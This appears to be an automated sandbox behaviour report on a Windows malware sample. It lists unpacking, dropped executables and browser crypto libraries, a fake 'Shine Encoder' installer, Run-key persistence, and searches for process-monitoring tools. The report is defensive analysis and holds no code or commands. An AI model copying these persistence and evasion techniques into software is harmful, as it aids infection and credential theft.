Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Shine Encoder_is1

Source: file.exe

Static file information: File size 1812480 > 1048576

Source: file.exe

Static PE information: Raw size of ylgrvzmt is bigger than: 0x100000 < 0x1a0c00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e708276138.exe, 00000013.00000003.2809369415.0000000008480000.00000004.00001000.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2955418011.0000000006352000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2955938891.0000000008380000.00000004.00001000.00020000.00000000.sdmp, e708276138.exe, 00000015.00000002.3054578560.00000000062A2000.00000040.00000800.00020000.00000000.sdmp, 76f1524c8d.exe, 00000018.00000002.2873694128.0000000000602000.00000040.00000001.01000000.00000016.sdmp, 76f1524c8d.exe, 00000018.00000003.2737841216.00000000045F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.7f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW;
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Unpacked PE file: 9.2.DocumentsGDHIDHIEGI.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;edncfhzz:EW;ywkrkdul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;edncfhzz:EW;ywkrkdul:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W;edncfhzz:EW;ywkrkdul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;edncfhzz:EW;ywkrkdul:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Unpacked PE file: 19.2.e708276138.exe.2b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Unpacked PE file: 20.2.df5dd36577.exe.b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Unpacked PE file: 21.2.e708276138.exe.2b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Unpacked PE file: 23.2.e708276138.exe.2b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Unpacked PE file: 24.2.76f1524c8d.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;fnateuls:EW;eutlwerm:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Unpacked PE file: 25.2.df5dd36577.exe.b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylgrvzmt:EW;sdrnsjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Unpacked PE file: 30.2.e708276138.exe.2b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;inlhqcme:EW;dbbpexbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Unpacked PE file: 37.2.76f1524c8d.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;fnateuls:EW;eutlwerm:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: e708276138.exe.11.dr	Static PE information: real checksum: 0x1d33a1 should be: 0x1cfb7d
Source: is-QG72D.tmp.13.dr	Static PE information: real checksum: 0x0 should be: 0x275889
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x1d33a1 should be: 0x1cfb7d
Source: random[2].exe.11.dr	Static PE information: real checksum: 0x2ab314 should be: 0x2acb61
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x323e7d should be: 0x3275a8
Source: 76f1524c8d.exe.11.dr	Static PE information: real checksum: 0x2ab314 should be: 0x2acb61
Source: stories.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f6a65
Source: stories[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f6a65
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1c221e should be: 0x1bf4b2
Source: is-H7GRO.tmp.13.dr	Static PE information: real checksum: 0x0 should be: 0x14c290
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: real checksum: 0x323e7d should be: 0x3275a8
Source: _iscrypt.dll.13.dr	Static PE information: real checksum: 0x0 should be: 0x89d2
Source: file.exe	Static PE information: real checksum: 0x1c221e should be: 0x1bf4b2
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x323e7d should be: 0x3275a8
Source: stories.tmp.12.dr	Static PE information: real checksum: 0x0 should be: 0x273d7f
Source: df5dd36577.exe.11.dr	Static PE information: real checksum: 0x1c221e should be: 0x1bf4b2

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ylgrvzmt
Source: file.exe	Static PE information: section name: sdrnsjgb
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: edncfhzz
Source: random[1].exe.0.dr	Static PE information: section name: ywkrkdul
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name:
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: edncfhzz
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: ywkrkdul
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: edncfhzz
Source: skotes.exe.9.dr	Static PE information: section name: ywkrkdul
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: ylgrvzmt
Source: random[1].exe.11.dr	Static PE information: section name: sdrnsjgb
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: df5dd36577.exe.11.dr	Static PE information: section name:
Source: df5dd36577.exe.11.dr	Static PE information: section name: .rsrc
Source: df5dd36577.exe.11.dr	Static PE information: section name: .idata
Source: df5dd36577.exe.11.dr	Static PE information: section name:
Source: df5dd36577.exe.11.dr	Static PE information: section name: ylgrvzmt
Source: df5dd36577.exe.11.dr	Static PE information: section name: sdrnsjgb
Source: df5dd36577.exe.11.dr	Static PE information: section name: .taggant
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: random[2].exe.11.dr	Static PE information: section name: fnateuls
Source: random[2].exe.11.dr	Static PE information: section name: eutlwerm
Source: random[2].exe.11.dr	Static PE information: section name: .taggant
Source: 76f1524c8d.exe.11.dr	Static PE information: section name:
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: .idata
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: fnateuls
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: eutlwerm
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: .taggant
Source: stories[1].exe.11.dr	Static PE information: section name: .didata
Source: stories.exe.11.dr	Static PE information: section name: .didata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: inlhqcme
Source: random[1].exe0.11.dr	Static PE information: section name: dbbpexbo
Source: random[1].exe0.11.dr	Static PE information: section name: .taggant
Source: e708276138.exe.11.dr	Static PE information: section name:
Source: e708276138.exe.11.dr	Static PE information: section name: .rsrc
Source: e708276138.exe.11.dr	Static PE information: section name: .idata
Source: e708276138.exe.11.dr	Static PE information: section name:
Source: e708276138.exe.11.dr	Static PE information: section name: inlhqcme
Source: e708276138.exe.11.dr	Static PE information: section name: dbbpexbo
Source: e708276138.exe.11.dr	Static PE information: section name: .taggant
Source: stories.tmp.12.dr	Static PE information: section name: .didata
Source: shineencoder32.exe.13.dr	Static PE information: section name: .pqr7
Source: is-QG72D.tmp.13.dr	Static PE information: section name: .didata
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /4
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /19
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /35
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /51
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /63
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /77
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /89
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /102
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /113
Source: is-1GO4T.tmp.13.dr	Static PE information: section name: /124
Source: EShineEncoder.exe.16.dr	Static PE information: section name: .pqr7
Source: sqlite3.dll.16.dr	Static PE information: section name: /4
Source: sqlite3.dll.16.dr	Static PE information: section name: /19
Source: sqlite3.dll.16.dr	Static PE information: section name: /35
Source: sqlite3.dll.16.dr	Static PE information: section name: /51
Source: sqlite3.dll.16.dr	Static PE information: section name: /63
Source: sqlite3.dll.16.dr	Static PE information: section name: /77
Source: sqlite3.dll.16.dr	Static PE information: section name: /89
Source: sqlite3.dll.16.dr	Static PE information: section name: /102
Source: sqlite3.dll.16.dr	Static PE information: section name: /113
Source: sqlite3.dll.16.dr	Static PE information: section name: /124

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_0069D91C push ecx; ret	9_2_0069D92F
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_00691359 push es; ret	9_2_0069135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_005ED91C push ecx; ret	10_2_005ED92F
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B05BBD push DA97D451h; iretd	19_3_05B05BC3
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Code function: 19_3_05B03CAF push esi; iretd	19_3_05B03CB0

Source: file.exe	Static PE information: section name: ylgrvzmt entropy: 7.954314747834039
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.068986521366023
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: entropy: 7.068986521366023
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.068986521366023
Source: random[1].exe.11.dr	Static PE information: section name: ylgrvzmt entropy: 7.954314747834039
Source: df5dd36577.exe.11.dr	Static PE information: section name: ylgrvzmt entropy: 7.954314747834039
Source: random[2].exe.11.dr	Static PE information: section name: entropy: 7.802006426195015
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: entropy: 7.802006426195015
Source: random[1].exe0.11.dr	Static PE information: section name: entropy: 7.985178578250023
Source: random[1].exe0.11.dr	Static PE information: section name: inlhqcme entropy: 7.953892583780221
Source: e708276138.exe.11.dr	Static PE information: section name: entropy: 7.985178578250023
Source: e708276138.exe.11.dr	Static PE information: section name: inlhqcme entropy: 7.953892583780221
Source: shineencoder32.exe.13.dr	Static PE information: section name: .text entropy: 7.537390201307809
Source: EShineEncoder.exe.16.dr	Static PE information: section name: .text entropy: 7.537390201307809

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsGDHIDHIEGI.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\is-QG72D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	File created: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-QVTBC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File created: C:\ProgramData\EShineEncoder\EShineEncoder.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\stories[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsGDHIDHIEGI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\CH375DLL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-H7GRO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-B7T63.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\cairogfx.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-AF5PH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File created: C:\ProgramData\EShineEncoder\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-1GO4T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-RGF1U.tmp	Jump to dropped file
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\WinSparkle.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File created: C:\ProgramData\EShineEncoder\EShineEncoder.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	File created: C:\ProgramData\EShineEncoder\sqlite3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsGDHIDHIEGI.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run df5dd36577.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e708276138.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76f1524c8d.exe	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsGDHIDHIEGI.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
